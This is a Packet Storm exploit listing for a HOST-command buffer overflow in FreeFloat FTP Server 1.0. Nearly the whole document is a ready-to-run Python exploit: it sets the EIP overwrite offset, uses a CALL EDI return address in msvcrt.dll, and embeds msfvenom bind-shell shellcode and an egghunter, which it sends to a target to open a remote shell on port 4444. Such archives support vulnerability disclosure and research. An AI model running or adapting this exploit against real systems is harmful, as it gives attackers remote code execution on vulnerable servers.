FreeFloat FTP Server 1.0 HOST Buffer Overflow

2017-11-06T00:00:00
ID PACKETSTORM:144891
Type packetstorm
Reporter 1N3
Modified 2017-11-06T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)  
# Date: 11/05/2017  
# Exploit Author: 1N3@CrowdShield - https://crowdshield  
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip  
# Version: 1.00  
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)  
# CVE : N/A  
  
import socket, time  
  
# CONNECT TO HOST  
host = "10.0.0.39"  
port = 21  
  
# [*] Exact match at offset 246  
#buffer = "HOST " + "\x41" * 246 + "\x42" * 4 + "\x43" * 745 + '\r\n'  
  
# AFTER CRASH  
#EAX 00000408  
#ECX 001FC700  
#EDX 77C45E74 ntdll.KiFastSystemCallRet  
#EBX 0000001A  
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC  
#EBP 016D13F0  
#ESI 0040A29E FTPServer.0040A29E  
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC  
#EIP 42424242  
  
# !mona suggest  
# 0BADF00D [+] Examining registers  
# 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246)  
# 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)  
# 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273)  
  
# CALL EDI - msvcrt.dll  
#Found commands (All modules), item 5241  
# Address=77D918F6  
# Disassembly=CALL EDI  
# Module Name=C:\Windows\system32\msvcrt.dll  
  
# BIND SHELL  
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"  
# Payload size: 355 bytes + 4 byte egg = 359 bytes  
# Final size of python file: 1710 bytes  
bind_shell = "T00WT00W"  
bind_shell += "\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"  
bind_shell += "\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"  
bind_shell += "\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"  
bind_shell += "\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"  
bind_shell += "\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"  
bind_shell += "\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"  
bind_shell += "\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"  
bind_shell += "\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"  
bind_shell += "\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"  
bind_shell += "\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"  
bind_shell += "\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"  
bind_shell += "\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"  
bind_shell += "\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"  
bind_shell += "\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"  
bind_shell += "\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"  
bind_shell += "\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"  
bind_shell += "\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"  
bind_shell += "\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"  
bind_shell += "\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"  
bind_shell += "\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"  
bind_shell += "\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"  
bind_shell += "\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"  
bind_shell += "\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"  
bind_shell += "\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"  
bind_shell += "\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"  
bind_shell += "\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"  
bind_shell += "\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"  
bind_shell += "\x5d\x20\x33\x95"  
  
# 32 BYTE EGGHUNTER  
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
# CALL EDI - msvcrt.dll  
eip = "\xF6\x18\xD9\x77"  
  
buffer = "HOST " + "\x41" * 246 + eip + "\x90" * 10 + bind_shell + "\x90" * 241 + egghunter + '\r\n'  
  
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((host,port))  
print sock.recv(1024)  
sock.settimeout(10)  
  
print "Sending buffer..."  
print str(buffer)  
sock.sendto(buffer, (host, port))  
print "Sent!"  
  
except:  
print "socket connection failed!"  
  
time.sleep(1)  
  
print "Done!"  
`